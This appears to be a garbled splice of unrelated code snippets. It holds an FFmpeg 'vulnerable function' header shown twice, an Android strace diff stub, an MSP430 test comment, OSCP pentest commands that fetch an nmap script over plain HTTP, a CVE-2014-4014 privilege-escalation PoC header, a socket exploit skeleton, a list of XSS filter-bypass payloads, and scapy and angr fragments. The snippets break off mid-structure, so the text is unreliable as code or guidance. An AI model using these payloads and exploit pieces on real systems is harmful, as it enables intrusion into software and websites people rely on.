vulnerable function:
export from libavfilter/vf_signature.c
static int export(AVFilterContext *ctx, StreamContext *sc, int input)
{
SignatureContext* sic = ctx->priv;
char filename[1024];
# dev:~/android/source/external/strace$ git diff | |
# | |
# to apply & build: | |
# | |
# dev:~/android/source/external/strace$ patch -p1 < strace-static.diff | |
# dev:~/android/source/external/strace$ cd ../.. | |
# dev:~/android/source$ mmm external/strace | |
# | |
diff --git a/Android.mk b/Android.mk | |
index 5274280..4f1707e 100644 |
/****************************************************************************** | |
* MSP430G2553 ACLK Test | |
* | |
* Description: This code can be used to test if you have installed the | |
* 32.768kHz crystal on your LaunchPad correctly. Using this code | |
* LED1 (on P1.0) will turn on for 1 second, and off for one | |
* second. You can verify this with either an oscilloscope, logic | |
* analyzer, or by inspection. Simple as that! | |
* | |
* This code was originally created for "NJC's MSP430 |
OSCP Handy Commands | |
Nmap full web vulnerability scan (installing the third-party "vulscan" NSE script): | |
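# Install the third-party "vulscan" NSE script into nmap's script directory.
# NOTE(review): the archive is fetched over plain HTTP from a third-party host
# with no signature or checksum verification. Anything that can tamper with
# that download ends up running as NSE Lua inside nmap (usually as root), so
# verify the archive's hash against a trusted source before unpacking it, and
# use an https:// URL if the host offers one.
mkdir -p /usr/share/nmap/scripts/vulscan
# The original had a typo here ("scrripts"); the cd failed and the archive was
# downloaded and unpacked into whatever the current directory happened to be.
# Abort on failure so the same thing cannot happen silently.
cd /usr/share/nmap/scripts/vulscan || exit 1
wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz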
/** | |
* CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC | |
* | |
* Vitaly Nikolenko | |
* http://hashcrack.org | |
* | |
* Usage: ./poc [file_path] | |
* | |
* where file_path is the file on which you want to set the sgid bit | |
*/ |
vulnerable function:
export from libavfilter/vf_signature.c
static int export(AVFilterContext *ctx, StreamContext *sc, int input)
{
SignatureContext* sic = ctx->priv;
char filename[1024];
import socket | |
import telnetlib | |
import struct | |
""" | |
developed on stream: https://www.youtube.com/watch?v=zWgS6fTw4Ts | |
""" | |
# Open a plain TCP connection to the local listener on port 2323.
# The target service is assumed to be the binary from the linked stream —
# confirm what is actually listening there before sending exploit input.
s = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
s.connect(("127.0.0.1", 2323))
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
import networkx | |
import angr | |
import tracer | |
import sys | |
import os | |
import logging | |
import pickle | |
import argparse | |
from collections import Counter |
You might want to read this to get an introduction to armel vs armhf.
If the steps below are too much, you can try Ubuntu-ARMv7-Qemu instead, but note that it contains non-free (closed-source) binary blobs.
First, cross-compile the user programs with a GCC ARM toolchain. Then install qemu-arm-static so that you can run ARM executables directly on Linux. If there is no qemu-arm-static in the package list, install qemu-user-static instead.
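from scapy.all import * | |
# Send one recursive DNS query for www.thepacketgeek.com to Google's resolver
# (8.8.8.8) and print a one-line summary of the reply. sr1() sends and sniffs
# with raw sockets, so this normally has to run with root privileges.
#
# A bounded timeout keeps the call from blocking forever when no reply comes
# back (filtered port, no network). In that case sr1() returns None, which the
# original code passed straight to answer[DNS] and crashed on with a TypeError.
answer = sr1(IP(dst="8.8.8.8")/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname="www.thepacketgeek.com")), timeout=5, verbose=0) | |
if answer is None or DNS not in answer:
    # No reply, or a reply that is not a DNS packet: report instead of crashing.
    print("no DNS reply received")
else:
    print(answer[DNS].summary()) |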